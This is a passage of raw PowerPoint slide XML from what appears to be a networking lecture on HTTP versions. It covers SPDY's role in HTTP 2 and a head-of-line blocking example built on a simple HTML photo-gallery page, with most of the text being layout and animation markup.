              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>HTTP 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41747957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C161-C3E5-C19A-B8B2-CD2FDA7C2B0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP Over Time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B574D815-5983-D4A1-1B2D-D2EA81DBC072}"/>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74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58A509F9-999D-A594-C855-EDA1EF028A0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="203200" y="1600200"/>
          <a:ext cx="11785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52F776E8-85BE-6D57-A250-52C36AA260DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7934400" y="2246400"/>
            <a:ext cx="1814400" cy="37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AC5F6F-7DD0-EECE-8FEC-D40BB57F4642}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9663600" y="2246400"/>
            <a:ext cx="1814400" cy="37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60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1"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14353-BBB5-96F4-BD72-9B853ACF3030}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Motivation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33912070-6126-A0B5-4C49-E36D1D5FBBD9}"/>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75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{309A5EB7-4957-214C-E643-90F41870DE4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Google’s business depends on the Web, so they care very much about performance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Designed an experimental protocol called SPDY, deployed in Chrome</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Eventually became the basis of the HTTP 2 specification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="880110" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Text-based encoding of HTTP is inefficient</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="880110" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Head-of-line blocking during Connection: keep-alive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="880110" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>No way to preemptively send objects to clients</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30625462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A9C2-5CCF-4C08-D5C6-B4373530F775}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Head-of-line Blocking Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{181B7820-3B75-2091-7939-7BEFD682C7AB}"/>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76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B0E1AC8-0E82-2E1E-2D09-626C45CEA3E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="203200" y="1905988"/>
            <a:ext cx="8478983" cy="4471060"/>
            <a:chOff x="1193470" y="2018805"/>
            <a:chExt cx="9666514" cy="4471060"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7F484CD-AAE5-B81A-38A8-7974EE7C3191}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1193470" y="2018805"/>
              <a:ext cx="9666514" cy="447106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7054D56-FC90-04A8-AF74-E32CD72F3E2D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2757172" y="2075212"/>
              <a:ext cx="6512035" cy="584775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="3200" b="1" u="sng" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>My Awesome Photo Gallery</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA21EF51-0A9D-9D5B-F670-C9A1771F6145}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="362529" y="3057852"/>
            <a:ext cx="8136577" cy="2808557"/>
            <a:chOff x="2101932" y="3170669"/>
            <a:chExt cx="8136577" cy="2808557"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A0C57C3-A718-804A-83AE-B6230FBA2257}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2101932" y="3170712"/>
              <a:ext cx="2422567" cy="2808514"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="57150">
              <a:solidFill>
                <a:schemeClr val="bg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C73787-D7F7-A0EA-5A4D-7CA148286E77}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4958937" y="3170669"/>
              <a:ext cx="2422567" cy="2808514"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="57150">
              <a:solidFill>
                <a:schemeClr val="bg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2636002-BEA8-C9D2-1BFD-718A62DF0BEF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7815942" y="3170669"/>
              <a:ext cx="2422567" cy="2808514"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="57150">
              <a:solidFill>
                <a:schemeClr val="bg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Shape 357">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27215ABE-57EA-4FD5-657A-E0ACA512E3C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8933543" y="2404592"/>
            <a:ext cx="3101673" cy="31530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C79C24"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C79C24"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>doctype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C79C24"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> html&gt;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&lt;html&gt;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&lt;body&gt;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&lt;h1&gt;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My Awesome Photo Gallery</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&lt;/h1&gt;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“cat1.jpg"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt;&lt;/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“cat2.jpg"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt;&lt;/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“cat3.jpg"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt;&lt;/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&lt;/body&gt;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&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5263E9E-CCB5-0A52-C81D-057AB8888E04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="869933" y="4138942"/>
            <a:ext cx="1407758" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>10 MB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B92FDD3A-D31F-E501-B948-D1840F607754}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3916745" y="4138941"/>
            <a:ext cx="1051891" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>5 KB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FFE098D-B0E0-DDB4-0E48-241CAC13A659}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6760887" y="4138940"/>
            <a:ext cx="1051891" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>1 KB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="CDN media">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0292F33B-9254-66B3-E66D-1A69E2B05A1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43" r="25573"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6076539" y="3057852"/>
            <a:ext cx="2422567" cy="28085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8EA0BCA-6531-D8D1-573D-7540899F2A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14" r="15281"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3219534" y="3057851"/>
            <a:ext cx="2422568" cy="28085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E16FAFC-CD17-EFBF-8D7B-B09E47A1F2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129" r="8144"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="362528" y="3057850"/>
            <a:ext cx="2422568" cy="2808516"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Speech Bubble: Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA785755-E6BB-76AA-CA61-D81A95DB2F7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9061753" y="1024800"/>
            <a:ext cx="3018586" cy="2209800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -6021"/>
              <a:gd name="adj2" fmla="val 86432"/>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t>Problem: client does not know the size of objects, downloads them in order, one HTTP request at a time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28231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030"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1030"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="8" presetID="14" presetClass="exit" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1028"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1028"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="14" presetClass="exit" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1026"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="102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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20"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wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="5000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1030"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="26" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="27" presetID="22" presetClass="entr" presetSubtype="1"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wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1028"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5750"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="22" presetClass="entr" presetSubtype="1" fill="hold" nodeType="after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wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="25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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1030"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1030"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="39" presetID="14" presetClass="exit" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1028"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1028"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="42" presetID="14" presetClass="exit" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1026"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1026"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:se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wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="250"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1026"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="49" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="750"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="50" presetID="22" presetClass="entr" presetSubtype="1" fill="hold" nodeType="after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wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1028"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
